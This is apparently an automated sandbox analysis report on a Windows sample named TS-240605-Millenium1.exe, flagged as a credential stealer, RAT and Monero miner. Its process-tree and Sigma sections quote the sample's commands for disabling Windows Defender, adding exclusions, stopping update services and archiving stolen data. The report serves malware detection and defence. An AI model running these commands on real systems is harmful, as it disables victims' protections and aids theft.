Edit tour

Windows Analysis Report
TS-240605-Millenium1.exe

Overview

General Information

Sample name:	TS-240605-Millenium1.exe
Analysis ID:	1452142
MD5:	4ce7dec7f0af15277eec727a9e20142e
SHA1:	5bae148e9a1865370d25d805439e60f057806a04
SHA256:	fccf2be42bab41f3d1f8bb7778765729cdf5ed10a0bd65871ba3bd2b827c2402
Tags:	exe
Infos:

Detection

Blank Grabber, Discord Token Stealer, Millenuim RAT, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop multiple services

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Blank Grabber

Yara detected Discord Token Stealer

Yara detected Millenuim RAT

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected Xmrig cryptocurrency miner

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Creates a thread in another existing process (thread injection)

Creates autostart registry keys with suspicious names

Drops PE files with benign system names

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Hides threads from debuggers

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies Windows Defender protection settings

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries Google from non browser process on port 80

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Removes signatures from Windows Defender

Sample is not signed and drops a device driver

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: System File Execution Location Anomaly

Stops critical windows services

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TS-240605-Millenium1.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\TS-240605-Millenium1.exe" MD5: 4CE7DEC7F0AF15277EEC727A9E20142E)

TS-240605-Millenium1.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\TS-240605-Millenium1.exe" MD5: 4CE7DEC7F0AF15277EEC727A9E20142E)

cmd.exe (PID: 7680 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Build.exe (PID: 7736 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym MD5: B72CBBAF7F2E3E31E90944AC747798D3)

hacn.exe (PID: 7800 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: B9F3E6E06F33EE7078F514D41BE5FAAD)

hacn.exe (PID: 7856 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: B9F3E6E06F33EE7078F514D41BE5FAAD)

cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

s.exe (PID: 7924 cmdline: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym MD5: 8198AD352AB70C2C974AB5C716956CD7)

main.exe (PID: 5064 cmdline: "C:\ProgramData\main.exe" MD5: 5DF3E2C717F267899F37EC6E8FC7F47A)

cmd.exe (PID: 3796 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 2112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7296 cmdline: Tasklist /fi "PID eq 5064" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 648 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

timeout.exe (PID: 7956 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)

Conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7924 cmdline: Tasklist /fi "PID eq 5064" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7928 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

timeout.exe (PID: 7728 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)

tasklist.exe (PID: 3740 cmdline: Tasklist /fi "PID eq 5064" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7352 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

svchost.exe (PID: 4944 cmdline: "C:\ProgramData\svchost.exe" MD5: 48B277A9AC4E729F9262DD9F7055C422)

svchost.exe (PID: 5952 cmdline: "C:\ProgramData\svchost.exe" MD5: 48B277A9AC4E729F9262DD9F7055C422)

cmd.exe (PID: 2028 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

setup.exe (PID: 5084 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)

dialer.exe (PID: 7448 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

updater.exe (PID: 7324 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)

lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

based.exe (PID: 7812 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 363F8437904AD603ECDF0D5329610D88)

based.exe (PID: 7840 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 363F8437904AD603ECDF0D5329610D88)

cmd.exe (PID: 8056 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8160 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8064 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8152 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3052 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7700 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4108 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7732 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 2816 cmdline: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 7920 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5000 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 560 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7660 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7860 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2364 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7248 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7928 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 5468 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7712 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

powershell.exe (PID: 3428 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI78122\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\ProgramData\main.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\ProgramData\main.exe	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
C:\ProgramData\main.exe	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
C:\ProgramData\main.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\ProgramData\main.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Windows\Temp\wxyubnjmnlae.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\Temp\wxyubnjmnlae.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x37e798:$a1: mining.set_target 0x370a20:$a2: XMRIG_HOSTNAME 0x373348:$a3: Usage: xmrig [OPTIONS] 0x3709f8:$a4: XMRIG_VERSION
C:\Windows\Temp\wxyubnjmnlae.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3c8631:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Windows\Temp\wxyubnjmnlae.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3c8eb8:$s1: %s/%s (Windows NT %lu.%lu 0x3cc9c8:$s3: \\.\WinRing0_ 0x375948:$s4: pool_wallet 0x36fdf0:$s5: cryptonight 0x36fe00:$s5: cryptonight 0x36fe10:$s5: cryptonight 0x36fe20:$s5: cryptonight 0x36fe38:$s5: cryptonight 0x36fe48:$s5: cryptonight 0x36fe58:$s5: cryptonight 0x36fe70:$s5: cryptonight 0x36fe80:$s5: cryptonight 0x36fe98:$s5: cryptonight 0x36feb0:$s5: cryptonight 0x36fec0:$s5: cryptonight 0x36fed0:$s5: cryptonight 0x36fee0:$s5: cryptonight 0x36fef8:$s5: cryptonight 0x36ff10:$s5: cryptonight 0x36ff20:$s5: cryptonight 0x36ff30:$s5: cryptonight
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author
00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000007.00000003.1878137948.00000235B9F86000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.1878137948.00000235B9F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: based.exe PID: 7812	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: based.exe PID: 7840	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: based.exe PID: 7840	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: based.exe PID: 7840	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: main.exe PID: 5064	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: main.exe PID: 5064	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
Process Memory Space: main.exe PID: 5064	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: main.exe PID: 5064	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author
21.0.main.exe.25eb5a3ef04.2.raw.unpack	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
21.0.main.exe.25eb5a3ef04.2.raw.unpack	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
21.0.main.exe.25eb5a3ef04.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
21.0.main.exe.25eb5a3ef04.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
21.0.main.exe.25eb5a30000.0.unpack	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
21.0.main.exe.25eb5a30000.0.unpack	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
21.0.main.exe.25eb5a30000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
21.0.main.exe.25eb5a30000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
21.0.main.exe.25eb5ba05b8.1.raw.unpack	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
21.0.main.exe.25eb5ba05b8.1.raw.unpack	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
21.0.main.exe.25eb5ba05b8.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
21.0.main.exe.25eb5ba05b8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 7 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7860, ProcessName: cmd.exe

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe, ProcessId: 7924, TargetFilename: C:\ProgramData\svchost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7840, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 8056, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7840, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 8064, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7840, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *", ProcessId: 7820, ProcessName: cmd.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

